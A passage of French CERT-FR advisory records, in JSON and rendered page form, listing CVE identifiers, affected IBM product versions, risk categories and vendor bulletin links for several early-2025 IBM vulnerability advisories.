"url": "https://www.cve.org/CVERecord?id=CVE-2024-50267"
},
{
"name": "CVE-2019-9638",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-9638"
},
{
"name": "CVE-2022-49016",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49016"
},
{
"name": "CVE-2023-52492",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52492"
},
{
"name": "CVE-2023-5868",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5868"
},
{
"name": "CVE-2019-9639",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-9639"
},
{
"name": "CVE-2023-28154",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28154"
},
{
"name": "CVE-2024-27062",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27062"
},
{
"name": "CVE-2024-35839",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35839"
},
{
"name": "CVE-2024-49977",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49977"
},
{
"name": "CVE-2024-43889",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43889"
},
{
"name": "CVE-2019-20444",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-20444"
},
{
"name": "CVE-2024-29415",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29415"
},
{
"name": "CVE-2024-46820",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46820"
},
{
"name": "CVE-2024-45018",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45018"
},
{
"name": "CVE-2024-33883",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-33883"
},
{
"name": "CVE-2024-43880",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43880"
},
{
"name": "CVE-2024-26615",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26615"
},
{
"name": "CVE-2024-50130",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50130"
},
{
"name": "CVE-2024-4317",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4317"
},
{
"name": "CVE-2024-25026",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25026"
},
{
"name": "CVE-2024-38586",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38586"
},
{
"name": "CVE-2024-53047",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53047"
},
{
"name": "CVE-2024-31141",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-31141"
},
{
"name": "CVE-2023-5870",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5870"
},
{
"name": "CVE-2024-4067",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4067"
},
{
"name": "CVE-2024-45769",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45769"
},
{
"name": "CVE-2024-10977",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10977"
},
{
"name": "CVE-2024-27017",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27017"
},
{
"name": "CVE-2018-20506",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-20506"
},
{
"name": "CVE-2018-20346",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-20346"
},
{
"name": "CVE-2024-46845",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46845"
},
{
"name": "CVE-2024-40983",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40983"
},
{
"name": "CVE-2021-37137",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-37137"
},
{
"name": "CVE-2023-5869",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5869"
},
{
"name": "CVE-2022-49003",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49003"
},
{
"name": "CVE-2024-42079",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42079"
},
{
"name": "CVE-2024-35898",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35898"
},
{
"name": "CVE-2024-43854",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43854"
},
{
"name": "CVE-2024-44935",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-44935"
},
{
"name": "CVE-2024-50124",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50124"
},
{
"name": "CVE-2022-24823",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-24823"
},
{
"name": "CVE-2024-49875",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49875"
},
{
"name": "CVE-2019-9020",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-9020"
},
{
"name": "CVE-2024-41066",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41066"
},
{
"name": "CVE-2021-37136",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-37136"
},
{
"name": "CVE-2019-9023",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-9023"
},
{
"name": "CVE-2024-7348",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7348"
},
{
"name": "CVE-2024-42244",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42244"
},
{
"name": "CVE-2024-10976",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10976"
},
{
"name": "CVE-2024-41942",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41942"
},
{
"name": "CVE-2021-21295",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21295"
},
{
"name": "CVE-2024-45770",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45770"
},
{
"name": "CVE-2024-26851",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26851"
},
{
"name": "CVE-2022-48773",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48773"
},
{
"name": "CVE-2019-12900",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-12900"
},
{
"name": "CVE-2024-50282",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50282"
},
{
"name": "CVE-2024-24857",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24857"
},
{
"name": "CVE-2024-49866",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49866"
},
{
"name": "CVE-2024-49949",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49949"
},
{
"name": "CVE-2021-43797",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43797"
},
{
"name": "CVE-2024-56201",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56201"
},
{
"name": "CVE-2024-41092",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41092"
},
{
"name": "CVE-2024-5569",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-5569"
},
{
"name": "CVE-2024-29736",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29736"
},
{
"name": "CVE-2019-9021",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-9021"
},
{
"name": "CVE-2024-27268",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27268"
},
{
"name": "CVE-2024-47535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47535"
},
{
"name": "CVE-2022-21434",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21434"
},
{
"name": "CVE-2024-41042",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41042"
},
{
"name": "CVE-2023-2454",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2454"
},
{
"name": "CVE-2022-42004",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42004"
},
{
"name": "CVE-2024-10041",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10041"
},
{
"name": "CVE-2022-34169",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-34169"
},
{
"name": "CVE-2024-43892",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43892"
},
{
"name": "CVE-2024-50252",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50252"
},
{
"name": "CVE-2024-37890",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37890"
},
{
"name": "CVE-2024-47668",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47668"
},
{
"name": "CVE-2017-15010",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-15010"
},
{
"name": "CVE-2023-52921",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52921"
},
{
"name": "CVE-2024-53677",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53677"
},
{
"name": "CVE-2024-10978",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10978"
},
{
"name": "CVE-2024-53140",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53140"
},
{
"name": "CVE-2024-50602",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50602"
},
{
"name": "CVE-2023-2455",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2455"
},
{
"name": "CVE-2024-39338",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39338"
},
{
"name": "CVE-2019-20478",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-20478"
},
{
"name": "CVE-2024-0985",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0985"
},
{
"name": "CVE-2024-38541",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38541"
},
{
"name": "CVE-2024-40984",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40984"
},
{
"name": "CVE-2023-52922",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52922"
},
{
"name": "CVE-2024-50274",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50274"
},
{
"name": "CVE-2024-38540",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38540"
},
{
"name": "CVE-2021-21290",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21290"
},
{
"name": "CVE-2024-29180",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29180"
},
{
"name": "CVE-2022-42003",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42003"
},
{
"name": "CVE-2024-53064",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53064"
},
{
"name": "CVE-2023-50314",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50314"
},
{
"name": "CVE-2023-52917",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52917"
},
{
"name": "CVE-2023-26136",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26136"
},
{
"name": "CVE-2024-44990",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-44990"
},
{
"name": "CVE-2023-42282",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-42282"
},
{
"name": "CVE-2024-42301",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42301"
},
{
"name": "CVE-2024-24786",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24786"
},
{
"name": "CVE-2024-22354",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22354"
},
{
"name": "CVE-2024-50279",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50279"
},
{
"name": "CVE-2022-21476",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21476"
},
{
"name": "CVE-2019-16869",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16869"
},
{
"name": "CVE-2022-23491",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23491"
},
{
"name": "CVE-2022-21541",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21541"
},
{
"name": "CVE-2024-26924",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26924"
},
{
"name": "CVE-2022-21540",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21540"
},
{
"name": "CVE-2024-44989",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-44989"
},
{
"name": "CVE-2018-20505",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-20505"
},
{
"name": "CVE-2024-32007",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-32007"
},
{
"name": "CVE-2024-10979",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10979"
},
{
"name": "CVE-2019-20445",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-20445"
},
{
"name": "CVE-2024-40961",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40961"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0106",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-02-07T00:00:00.000000"
}
],
"risks": [
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
},
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0 distance.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-02-04",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7182424",
"url": "https://www.ibm.com/support/pages/node/7182424"
},
{
"published_at": "2025-02-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7182335",
"url": "https://www.ibm.com/support/pages/node/7182335"
},
{
"published_at": "2025-02-02",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7181898",
"url": "https://www.ibm.com/support/pages/node/7181898"
},
{
"published_at": "2025-02-04",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7181480",
"url": "https://www.ibm.com/support/pages/node/7181480"
},
{
"published_at": "2025-02-05",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7182696",
"url": "https://www.ibm.com/support/pages/node/7182696"
}
]
}
CERTFR-2025-AVI-0045
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | QRadar Log Source Management App | QRadar Log Source Management App versions antérieures à 7.0.11 | ||
| IBM | Db2 Query Management Facility | DB2 Query Management Facility versions 13.1.1 et 13.1.2 sans la dernière version du JRE |
References
| Title | Publication Time | Tags | |||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "QRadar Log Source Management App versions ant\u00e9rieures \u00e0 7.0.11",
"product": {
"name": "QRadar Log Source Management App",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "DB2 Query Management Facility versions 13.1.1 et 13.1.2 sans la derni\u00e8re version du JRE",
"product": {
"name": "Db2 Query Management Facility",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2024-42459",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42459"
},
{
"name": "CVE-2024-21536",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21536"
},
{
"name": "CVE-2024-55565",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-55565"
},
{
"name": "CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"name": "CVE-2024-4068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4068"
},
{
"name": "CVE-2024-20926",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20926"
},
{
"name": "CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"name": "CVE-2024-42460",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42460"
},
{
"name": "CVE-2024-22361",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22361"
},
{
"name": "CVE-2024-20921",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20921"
},
{
"name": "CVE-2023-4807",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4807"
},
{
"name": "CVE-2024-33883",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-33883"
},
{
"name": "CVE-2023-22081",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22081"
},
{
"name": "CVE-2024-45590",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45590"
},
{
"name": "CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"name": "CVE-2024-4067",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4067"
},
{
"name": "CVE-2023-22067",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22067"
},
{
"name": "CVE-2024-48949",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-48949"
},
{
"name": "CVE-2024-21538",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21538"
},
{
"name": "CVE-2024-47764",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47764"
},
{
"name": "CVE-2024-48948",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-48948"
},
{
"name": "CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"name": "CVE-2024-45801",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45801"
},
{
"name": "CVE-2024-52798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52798"
},
{
"name": "CVE-2024-47875",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47875"
},
{
"name": "CVE-2024-37890",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37890"
},
{
"name": "CVE-2023-5676",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5676"
},
{
"name": "CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"name": "CVE-2024-47068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47068"
},
{
"name": "CVE-2024-20932",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20932"
},
{
"name": "CVE-2024-20918",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20918"
},
{
"name": "CVE-2024-42461",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42461"
},
{
"name": "CVE-2024-20945",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20945"
},
{
"name": "CVE-2024-20952",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20952"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0045",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-01-17T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-01-13",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7180895",
"url": "https://www.ibm.com/support/pages/node/7180895"
},
{
"published_at": "2025-01-13",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7180894",
"url": "https://www.ibm.com/support/pages/node/7180894"
},
{
"published_at": "2025-01-10",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7180725",
"url": "https://www.ibm.com/support/pages/node/7180725"
}
]
}
CERTFR-2025-AVI-0337
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Sterling | Sterling Connect:Direct Web Services versions 6.1.x antérieures à 6.1.0.28 | ||
| IBM | QRadar | QRadar Suite Software versions 1.1x.x.x antérieures à 1.11.2.x | ||
| IBM | Cloud Pak | Cloud Pak for Security versions 1.1x.x.x antérieures à 1.11.2.x | ||
| IBM | QRadar | SOAR QRadar Plugin App versions antérieures à 5.6.0 |
References
| Title | Publication Time | Tags | |||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Sterling Connect:Direct Web Services versions 6.1.x ant\u00e9rieures \u00e0 6.1.0.28",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Suite Software versions 1.1x.x.x ant\u00e9rieures \u00e0 1.11.2.x",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cloud Pak for Security versions 1.1x.x.x ant\u00e9rieures \u00e0 1.11.2.x",
"product": {
"name": "Cloud Pak",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "SOAR QRadar Plugin App versions ant\u00e9rieures \u00e0 5.6.0",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2024-42459",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42459"
},
{
"name": "CVE-2024-21235",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21235"
},
{
"name": "CVE-2024-6531",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6531"
},
{
"name": "CVE-2024-22201",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22201"
},
{
"name": "CVE-2023-1370",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1370"
},
{
"name": "CVE-2024-55565",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-55565"
},
{
"name": "CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"name": "CVE-2024-4068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4068"
},
{
"name": "CVE-2020-35494",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35494"
},
{
"name": "CVE-2020-15250",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-15250"
},
{
"name": "CVE-2024-23944",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-23944"
},
{
"name": "CVE-2024-12797",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12797"
},
{
"name": "CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"name": "CVE-2024-21068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21068"
},
{
"name": "CVE-2020-35496",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35496"
},
{
"name": "CVE-2024-21534",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21534"
},
{
"name": "CVE-2024-42460",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42460"
},
{
"name": "CVE-2024-56326",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56326"
},
{
"name": "CVE-2024-45813",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45813"
},
{
"name": "CVE-2025-24970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24970"
},
{
"name": "CVE-2023-45133",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45133"
},
{
"name": "CVE-2025-21613",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21613"
},
{
"name": "CVE-2024-12798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12798"
},
{
"name": "CVE-2023-25584",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25584"
},
{
"name": "CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"name": "CVE-2025-22866",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22866"
},
{
"name": "CVE-2024-4067",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4067"
},
{
"name": "CVE-2024-29018",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29018"
},
{
"name": "CVE-2024-8184",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8184"
},
{
"name": "CVE-2025-1302",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1302"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2024-21538",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21538"
},
{
"name": "CVE-2024-45336",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45336"
},
{
"name": "CVE-2024-48948",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-48948"
},
{
"name": "CVE-2024-0450",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0450"
},
{
"name": "CVE-2024-12801",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12801"
},
{
"name": "CVE-2018-18700",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-18700"
},
{
"name": "CVE-2024-47554",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47554"
},
{
"name": "CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"name": "CVE-2024-6763",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6763"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2024-7254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7254"
},
{
"name": "CVE-2019-16163",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16163"
},
{
"name": "CVE-2024-56201",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56201"
},
{
"name": "CVE-2023-51775",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51775"
},
{
"name": "CVE-2024-52798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52798"
},
{
"name": "CVE-2024-47535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47535"
},
{
"name": "CVE-2023-52428",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52428"
},
{
"name": "CVE-2024-10041",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10041"
},
{
"name": "CVE-2023-1972",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1972"
},
{
"name": "CVE-2025-26791",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-26791"
},
{
"name": "CVE-2024-10963",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10963"
},
{
"name": "CVE-2024-6119",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6119"
},
{
"name": "CVE-2023-25588",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25588"
},
{
"name": "CVE-2025-25193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25193"
},
{
"name": "CVE-2020-35495",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35495"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2024-42461",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42461"
},
{
"name": "CVE-2024-29180",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29180"
},
{
"name": "CVE-2019-12972",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-12972"
},
{
"name": "CVE-2025-1094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1094"
},
{
"name": "CVE-2023-25585",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25585"
},
{
"name": "CVE-2025-21614",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21614"
},
{
"name": "CVE-2025-21502",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21502"
},
{
"name": "CVE-2020-35507",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35507"
},
{
"name": "CVE-2020-35493",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35493"
},
{
"name": "CVE-2024-21217",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21217"
},
{
"name": "CVE-2018-12699",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-12699"
},
{
"name": "CVE-2024-57699",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57699"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0337",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-04-18T00:00:00.000000"
}
],
"risks": [
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
